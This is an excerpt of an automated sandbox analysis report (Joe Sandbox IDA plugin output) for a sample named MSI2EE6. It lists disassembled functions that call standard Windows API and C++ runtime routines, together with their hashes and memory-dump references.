                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                          • String ID: $+xv
                                                                          • API String ID: 2939335142-1686923651
                                                                          • Opcode ID: 53e725a972d87b294b921f9c6439cc50a87feb26ad1ef612eccf99b539906a57
                                                                          • Instruction ID: b04d894fa061f5e00e2eca42ac0fe49084af7f040905d58233aed95301fa22bc
                                                                          • Opcode Fuzzy Hash: 53e725a972d87b294b921f9c6439cc50a87feb26ad1ef612eccf99b539906a57
                                                                          • Instruction Fuzzy Hash: E821C7B1904B926FD725DF75C88077BBEF8AB08300F144A5AF059C7A41E770DA01CB90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Mpunct$H_prolog3
                                                                          • String ID: $+xv
                                                                          • API String ID: 4281374311-1686923651
                                                                          • Opcode ID: 920aef453f253dcbfad0a1809c379aa28a4045e7e8ae2783f48b04c0791f59cf
                                                                          • Instruction ID: 1c24665ef2d41f0e89c8282840598678bcfdd9e59b92a0cbcdb47958d9f64603
                                                                          • Opcode Fuzzy Hash: 920aef453f253dcbfad0a1809c379aa28a4045e7e8ae2783f48b04c0791f59cf
                                                                          • Instruction Fuzzy Hash: 0C21B2B1904B956ED725DFB5889077BBEF8AB09300F144A5AF199C7A42E770EA01CB90
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AFDD53,00000000,?,00B32EF4,?,?,?,00AFDEF6,00000004,InitializeCriticalSectionEx,00B212BC,InitializeCriticalSectionEx), ref: 00AFDDAF
                                                                          • GetLastError.KERNEL32(?,00AFDD53,00000000,?,00B32EF4,?,?,?,00AFDEF6,00000004,InitializeCriticalSectionEx,00B212BC,InitializeCriticalSectionEx,00000000,?,00AFDCAD), ref: 00AFDDB9
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AFDDE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3177248105-2084034818
                                                                          • Opcode ID: a2ef8c65d00beaf06917607b84dacb638a3b364198645bd0070584401cb64248
                                                                          • Instruction ID: 31de0dfd965b370c8b175c3f4ee50d78d03bb5c130b5c1e55d245f048e15f05a
                                                                          • Opcode Fuzzy Hash: a2ef8c65d00beaf06917607b84dacb638a3b364198645bd0070584401cb64248
                                                                          • Instruction Fuzzy Hash: 07E04F34681208B7EF111BA1EC0BFA87F559F00B54F648060FE0CE80E1EBB1E9549594
                                                                          APIs
                                                                          • _strcspn.LIBCMT ref: 00ADEE21
                                                                          • _strcspn.LIBCMT ref: 00ADEE45
                                                                            • Part of subcall function 00ADB420: LocalAlloc.KERNEL32(00000040,5E20FB33,5E20FB0F,00000000,?,?,5E20FB0F,00000001,?,?,?,?,5E20FB0F,00000000,?), ref: 00ADB4A7
                                                                            • Part of subcall function 00ADB420: LocalFree.KERNEL32(5E20FB0F,?,?,?,00000000,?,?,5E20FB0F,00000001,?,?,?,?,5E20FB0F,00000000,?), ref: 00ADB578
                                                                          • LocalFree.KERNEL32(?), ref: 00ADF225
                                                                          • LocalFree.KERNEL32(?), ref: 00ADF271
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Local$Free$_strcspn$Alloc
                                                                          • String ID:
                                                                          • API String ID: 3422560186-0
                                                                          • Opcode ID: 2a154bdf499928f04554e9dda8e6d005312702432b6e325f7134273018cf58c9
                                                                          • Instruction ID: 8c5fc634683ba40cded56b074394d7dac94d95ab61a2dc9034bcf3d59d71aaa6
                                                                          • Opcode Fuzzy Hash: 2a154bdf499928f04554e9dda8e6d005312702432b6e325f7134273018cf58c9
                                                                          • Instruction Fuzzy Hash: CB023875E00249DFDB14DFA4C944AEEBBB9FF48310F14816AE816AB351DB34AE41CB91
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEEBDB
                                                                          • numpunct.LIBCPMT ref: 00AEEFD0
                                                                            • Part of subcall function 00AEB36A: __EH_prolog3.LIBCMT ref: 00AEB371
                                                                            • Part of subcall function 00AEB102: __EH_prolog3.LIBCMT ref: 00AEB109
                                                                            • Part of subcall function 00AEB102: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB113
                                                                            • Part of subcall function 00AEB102: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB184
                                                                            • Part of subcall function 00ADEB00: std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB2D
                                                                            • Part of subcall function 00ADEB00: std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB50
                                                                            • Part of subcall function 00ADEB00: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEB78
                                                                            • Part of subcall function 00ADEB00: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEC21
                                                                            • Part of subcall function 00AE4A74: Concurrency::cancel_current_task.LIBCPMT ref: 00AE4B37
                                                                            • Part of subcall function 00AEA5F3: __EH_prolog3.LIBCMT ref: 00AEA5FA
                                                                            • Part of subcall function 00AEA5F3: std::_Lockit::_Lockit.LIBCPMT ref: 00AEA604
                                                                            • Part of subcall function 00AEA5F3: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA675
                                                                          • __Getcoll.LIBCPMT ref: 00AEED96
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                            • Part of subcall function 00AD8700: LocalAlloc.KERNEL32(00000040,00000000,00AFA0E5,00000000,5E20FB0F,?,00000000,?,00000000,?,00B1DC68,000000FF,?,00AD17B5,00000000,00B1EDDA), ref: 00AD8706
                                                                            • Part of subcall function 00ADBD10: __Getctype.LIBCPMT ref: 00ADBD1B
                                                                            • Part of subcall function 00AEAA06: __EH_prolog3.LIBCMT ref: 00AEAA0D
                                                                            • Part of subcall function 00AEAA06: std::_Lockit::_Lockit.LIBCPMT ref: 00AEAA17
                                                                            • Part of subcall function 00AEAB30: __EH_prolog3.LIBCMT ref: 00AEAB37
                                                                            • Part of subcall function 00AEAB30: std::_Lockit::_Lockit.LIBCPMT ref: 00AEAB41
                                                                            • Part of subcall function 00AEAD84: __EH_prolog3.LIBCMT ref: 00AEAD8B
                                                                            • Part of subcall function 00AEAD84: std::_Lockit::_Lockit.LIBCPMT ref: 00AEAD95
                                                                            • Part of subcall function 00AEAD84: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAE06
                                                                            • Part of subcall function 00AEACEF: __EH_prolog3.LIBCMT ref: 00AEACF6
                                                                            • Part of subcall function 00AEACEF: std::_Lockit::_Lockit.LIBCPMT ref: 00AEAD00
                                                                            • Part of subcall function 00AEACEF: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAD71
                                                                            • Part of subcall function 00AE4A74: __EH_prolog3.LIBCMT ref: 00AE4A7B
                                                                            • Part of subcall function 00AE4A74: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4A85
                                                                            • Part of subcall function 00AE4A74: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE4B2C
                                                                          • codecvt.LIBCPMT ref: 00AEF081
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_$H_prolog3$Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtnumpunct
                                                                          • String ID:
                                                                          • API String ID: 3763518620-0
                                                                          • Opcode ID: 33bbcf44fb1bdc7b10d10b914f8224293aad833fb3b837e1ed94c4dde9d1be88
                                                                          • Instruction ID: f10bff2155d6effcd4ce624d1ff71e2a89096a74df215d805513c0d494c1a404
                                                                          • Opcode Fuzzy Hash: 33bbcf44fb1bdc7b10d10b914f8224293aad833fb3b837e1ed94c4dde9d1be88
                                                                          • Instruction Fuzzy Hash: BCE12371800396AFDB21AF668D42A7F7AB5FF45360F20456EF919AB391EB318D0087D1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _strcspn$H_prolog3_ctype
                                                                          • String ID:
                                                                          • API String ID: 838279627-0
                                                                          • Opcode ID: 93bfe59b9794f54b89d251ac0eaca2028dc54cf6c1091b8f6d79d5c17c66ebfc
                                                                          • Instruction ID: 71d3bb3bcc114bf7a4fb6bffef1ac0d2ab6e94740c3c83d0dd9f4a6cd1aa29ca
                                                                          • Opcode Fuzzy Hash: 93bfe59b9794f54b89d251ac0eaca2028dc54cf6c1091b8f6d79d5c17c66ebfc
                                                                          • Instruction Fuzzy Hash: BAD17A71D04299AFDF15DFE5C980AEEBBB9FF08310F14412AE915AB251D730AE45CBA0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _strcspn$H_prolog3_ctype
                                                                          • String ID:
                                                                          • API String ID: 838279627-0
                                                                          • Opcode ID: eabcfa11993fcad6ecd5e67245965af69e4dd0b2396c970df58d9666f233a883
                                                                          • Instruction ID: 76d4d7686408cd4076b914c5e874543eb8a0a400e6069678b980c103a95e9e1c
                                                                          • Opcode Fuzzy Hash: eabcfa11993fcad6ecd5e67245965af69e4dd0b2396c970df58d9666f233a883
                                                                          • Instruction Fuzzy Hash: F0D17C71D002999FDF15DFE9C980AEEBBB9FF48310F14402AE815AB251D730AE45CBA0
                                                                          APIs
                                                                          • GetConsoleOutputCP.KERNEL32(5E20FB0F,?,00000000,?), ref: 00B176DE
                                                                            • Part of subcall function 00B105BF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B0DF21,?,00000000,-00000008), ref: 00B1066B
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B17939
                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B17981
                                                                          • GetLastError.KERNEL32 ref: 00B17A24
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 2112829910-0
                                                                          • Opcode ID: edfe6fd1527dcb4428eda4cdc1292adf6dec02065b2dd189f56c160d5a463364
                                                                          • Instruction ID: 5c9cda7c5ebc8f1fdda6f00f4a306c497238436fb4cef17dbf064c20874f5f9a
                                                                          • Opcode Fuzzy Hash: edfe6fd1527dcb4428eda4cdc1292adf6dec02065b2dd189f56c160d5a463364
                                                                          • Instruction Fuzzy Hash: 15D149B5D44258AFCB15CFA8D8809EDBBF5FF08310F5881AAE855EB351DB30A985CB50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer
                                                                          • String ID:
                                                                          • API String ID: 1740715915-0
                                                                          • Opcode ID: ddbf66cff4d07d70ca5dbd10c77f9a54d3004acf934644f252fca9e95d0b560c
                                                                          • Instruction ID: 03492a20ba10676b9c76b6cd95888778a8a7a67ce0d63771548e57475ace2c5b
                                                                          • Opcode Fuzzy Hash: ddbf66cff4d07d70ca5dbd10c77f9a54d3004acf934644f252fca9e95d0b560c
                                                                          • Instruction Fuzzy Hash: 2E51037260020EAFEB299F96DA41BBA77B5EF44720F14452DFE06872A1D731ED40C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 706cdcc46ca6e5e5e02ff26781536d8363ea900004899a3f602da194977b0129
                                                                          • Instruction ID: 4cee0429e25803bc64d46300aa029372a393922f8dec13501dbf091ac89586bc
                                                                          • Opcode Fuzzy Hash: 706cdcc46ca6e5e5e02ff26781536d8363ea900004899a3f602da194977b0129
                                                                          • Instruction Fuzzy Hash: F421A431600309AFDB21AF72DC9186BBFE9EF243647108598F926D7292D731ED5087A0
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00AD8D7C,00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD92A7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                          • API String ID: 1452528299-1781106413
                                                                          • Opcode ID: 6c79e675a4c76f1ceb9442f725d670e42b0789e9de99a96920ed82a14267d376
                                                                          • Instruction ID: ec3cda8a7cfb58de1c7d5ccbdadded142c443ca07de07d30a02b4864376d7477
                                                                          • Opcode Fuzzy Hash: 6c79e675a4c76f1ceb9442f725d670e42b0789e9de99a96920ed82a14267d376
                                                                          • Instruction Fuzzy Hash: F7216D4AB2026187CB741F7C940427AB2E5AF58754F25186FE8CAD7390EA79CC82C395
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AE4A7B
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AE4A85
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE4B2C
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AE4B37
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                          • String ID:
                                                                          • API String ID: 4244582100-0
                                                                          • Opcode ID: 4e2a4c99f05978eb344adb2e033285d2824af74bfd8ae0183926794df28eb371
                                                                          • Instruction ID: d64f474633d9adf7161354d12d6a09361fb527a0ad4ceb80118d9716d0b59407
                                                                          • Opcode Fuzzy Hash: 4e2a4c99f05978eb344adb2e033285d2824af74bfd8ae0183926794df28eb371
                                                                          • Instruction Fuzzy Hash: 60214C34A1065A9FCB08EF15C8A1A6DB775FF08310F448559E9169B391CF70ED10CF84
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,5E20FB0F), ref: 00AE19EC
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE1A0C
                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE1A3D
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE1A56
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                                          • String ID:
                                                                          • API String ID: 3604237281-0
                                                                          • Opcode ID: 6bb917f691958a5b23964afa145af33036a292dd38a30db9b1daefb330f039df
                                                                          • Instruction ID: 08ca3df9df1e90b05a0e1f10e7003d0e5d24dc60453e463a89c0029d01b0ef83
                                                                          • Opcode Fuzzy Hash: 6bb917f691958a5b23964afa145af33036a292dd38a30db9b1daefb330f039df
                                                                          • Instruction Fuzzy Hash: F621AF71941214AFD720CF14DD4AFAABBB8EB09B14F104269F914A72D0DBB46A04CBA4
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AE40D0
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AE40DA
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AE412B
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE414B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 18a9b78f8fbc22d0733dcd10e7eb2db397f63f67ea48f12a253a4ce7cd93d20f
                                                                          • Instruction ID: ec9d54c7c22703d9a7e5f795aa43f2dd7dacc9b605a157bec9283e7a3ac3b6e5
                                                                          • Opcode Fuzzy Hash: 18a9b78f8fbc22d0733dcd10e7eb2db397f63f67ea48f12a253a4ce7cd93d20f
                                                                          • Instruction Fuzzy Hash: 2F01F535D001999BCF05EBA5CA11BBEB7B9AF58320F25450AF821A73C1CF349E44CB80
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEB074
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEB07E
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEB0CF
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB0EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 9721c02eb21d83f43ec4f41895a6ada9201a62cdde4b8b805a11cd4dc30db45f
                                                                          • Instruction ID: 005bffa23cf122c3c984d2a3dd599a2cd363aa45d9b2a13e9a81e4afb5ec64e5
                                                                          • Opcode Fuzzy Hash: 9721c02eb21d83f43ec4f41895a6ada9201a62cdde4b8b805a11cd4dc30db45f
                                                                          • Instruction Fuzzy Hash: C201D235910259CBCB15EBA4D955BBF77B5BF44320F244509F921A7392CF34AE00C790
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEB19E
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEB1A8
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEB1F9
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB219
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 6f0b6d1a296d07ca1f6bb1aeeb608045f7aa630e711925324561914b227fd81c
